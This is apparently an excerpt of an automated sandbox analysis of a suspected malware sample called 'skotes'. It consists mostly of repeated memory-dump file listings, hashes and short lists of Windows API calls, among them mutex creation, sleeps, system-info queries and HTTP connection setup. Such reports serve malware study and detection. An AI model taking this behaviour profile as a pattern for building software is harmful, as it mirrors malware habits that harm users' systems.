                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 0c2232bbe926b7e369143fad17d9a2c35987c3f69bda0f06f1ac1f1defdd4a64
                                                                                                                                                                                                                                          • Instruction ID: 80f1fd12caeec3061210d935bc143fdec865dc6245c1a7806b471aa1ea6a31df
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c2232bbe926b7e369143fad17d9a2c35987c3f69bda0f06f1ac1f1defdd4a64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED3125316042048BEB48DB7CDC89B6DBBE2DBC6310F24C699E028DB2D2D77599808753
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7A7BA
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00000064,?), ref: 00B7A963
                                                                                                                                                                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,00BD3254), ref: 00B7A981
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 396266464-0
                                                                                                                                                                                                                                          • Opcode ID: 3e603dc68e1e35ad958a0efad64439fac8bc30397c5387a5a26669f10b221dff
                                                                                                                                                                                                                                          • Instruction ID: d5655bd5769a2ec941304c0ff7d867fb56304a601415264d41f4dda63bd1d0bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e603dc68e1e35ad958a0efad64439fac8bc30397c5387a5a26669f10b221dff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B312531A04104CBEB08DB6CDD89B6DBBE6DBC6310F248699E028972D1D77599818713
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B78524
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 1721193555-31779524
                                                                                                                                                                                                                                          • Opcode ID: fea7eb2d840bbc26a49391b45f4dde006e53adc02ac8ef267b6532bc4d2b652b
                                                                                                                                                                                                                                          • Instruction ID: 016a1c9999531d8fe6546384f28197f01809243fe71c82094dfc8b4ac645b165
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fea7eb2d840bbc26a49391b45f4dde006e53adc02ac8ef267b6532bc4d2b652b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B45125709442089BEB24EB68CD897DDB7F4DB46314F5082D9E42DA73D1EF749A808B91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00B87A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00B87AF8
                                                                                                                                                                                                                                            • Part of subcall function 00B87A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00B87B01
                                                                                                                                                                                                                                            • Part of subcall function 00B7BE30: Sleep.KERNEL32(000005DC,EB1D7F10,?,00000000), ref: 00B7BEB8
                                                                                                                                                                                                                                            • Part of subcall function 00B7BE30: InternetOpenW.WININET(00BC8DC8,00000000,00000000,00000000,00000000), ref: 00B7BEC7
                                                                                                                                                                                                                                            • Part of subcall function 00B7BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B7BEEC
                                                                                                                                                                                                                                            • Part of subcall function 00B7BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00B7BF36
                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 00B7E84E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InternetOpenSleep$Cnd_destroy_in_situConnectHttpMtx_destroy_in_situRequest
                                                                                                                                                                                                                                          • String ID: MGE+
                                                                                                                                                                                                                                          • API String ID: 2868416192-475891385
                                                                                                                                                                                                                                          • Opcode ID: 21995ed20d3f567732b013fe9f2d98c09f31fed6889ee6f60f0ab0d29d49a16f
                                                                                                                                                                                                                                          • Instruction ID: b90d91b3b1dd75e46595171e32cc1823d886e7025e354480b7ce44f545407553
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21995ed20d3f567732b013fe9f2d98c09f31fed6889ee6f60f0ab0d29d49a16f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69B1F871A101488BEB1CDB28CD8979DBBA2AF8A314F54C1CCE4789B3D6D735DA848B51
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
